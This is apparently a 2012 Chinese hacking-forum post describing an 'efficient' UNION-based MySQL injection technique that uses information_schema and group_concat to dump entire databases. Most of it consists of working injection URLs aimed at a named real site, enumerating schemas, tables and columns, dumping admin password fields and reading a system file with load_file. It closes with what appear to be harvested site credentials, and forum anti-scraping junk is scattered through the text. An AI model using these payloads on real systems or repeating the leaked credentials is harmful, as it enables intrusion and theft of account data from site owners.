找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2179|回复: 0
打印 上一主题 下一主题

mysql注入高效方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:37:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
- Y& d, a1 Z6 c, W1 _但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人$ @6 w$ c7 o( S( W% ?: ~
  k0 ^8 `5 _& [

! t( A" k7 ^: F% ]! ?优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入6 B+ y& r+ q0 l4 u( z( Q1 x) s5 J

1 `  n2 A" P0 A$ B/ q缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢.... F' B" a1 e+ c: S2 m, C" u3 u. u
# ?7 J% `% J# s' Q0 A( Y6 }
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
. ~% N9 D, \" N9 k+ X+ I/ J$ T. f5 [在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等9 u9 K, K2 W$ R# q8 |2 a0 f" k# d) L

" }6 a# t( K% j$ p4 b8 J- b' |http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
" m1 d, T9 ^; W2 }8 C
& |( b  [- Q6 J# A读出所有库:
  V/ c* x1 _! i7 l& ?4 h% \http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA. M3 N8 ]# _! ]+ D) {2 G& V. a, S
  K  t, R. T7 n- e- w8 y1 ^

% W& R  e+ U6 G. L- t8 [' g# Z6 |
1 d5 n$ {) E0 Z( y; c! m8 ^读出所有表:
9 E0 Q& {" H/ d  Y; }$ thttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()9 p1 h5 s3 i4 G0 L$ {  h+ s1 X! X

& j" W' A/ i) o9 M! P2 v+ o, m+ z( o读出所有表字段:2 U( w& B6 {. T; Q/ V
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
2 f. p. W2 ?0 O: j8 h: Y; O! `*/ (97,100,109,105,110)为admin的ascii码 依次类推$ }; }: e& v* x$ t8 k
! P  u4 Y9 }2 j& r3 h( e
读出所有表字段里的内容:+ }9 W9 O8 I) T8 L) N' Q
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin, m1 M# }2 i% M) y' b) n7 m8 U7 `

+ y, m8 T$ j$ |6 z' V( t1 x9 b4 c' O  l0 E; w7 a& P  d

. N  |$ t, G; i5 E, P4 L2 y) n% K: K7 C4 P/ j2 u% \

4 N+ d* \( J  N! K7 U! L8 }( h' Q
) [+ M" ^* S( n' khttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%234 {( }4 ~* ?! P% l. c$ q
3 z) w# I  z( [9 I
$ y. k! ]! O; p4 D& F0 ?, R) Q; y5 e
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
  d$ f8 I4 i9 Z; s, Z$ |4 C! s, H1 _# y3 C+ k
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
  W- R6 ^; ~6 p1 Z, c# ^3 A6 r5 F- t# p! D1 h
8 [# U. j0 Y" ^- i* Z% I8 k+ R9 f( U2 K
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
( ^+ l3 i* D  u, R9 l, W- Z+ Z
; E+ I- @( @0 p6 p9 X
0 x$ v2 M/ z4 e' W; ?: A7 ]        webmaster:dzb521123,simlab:simadmin20043233
, j( C4 ]% r7 y; Z9 a- I/ N
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表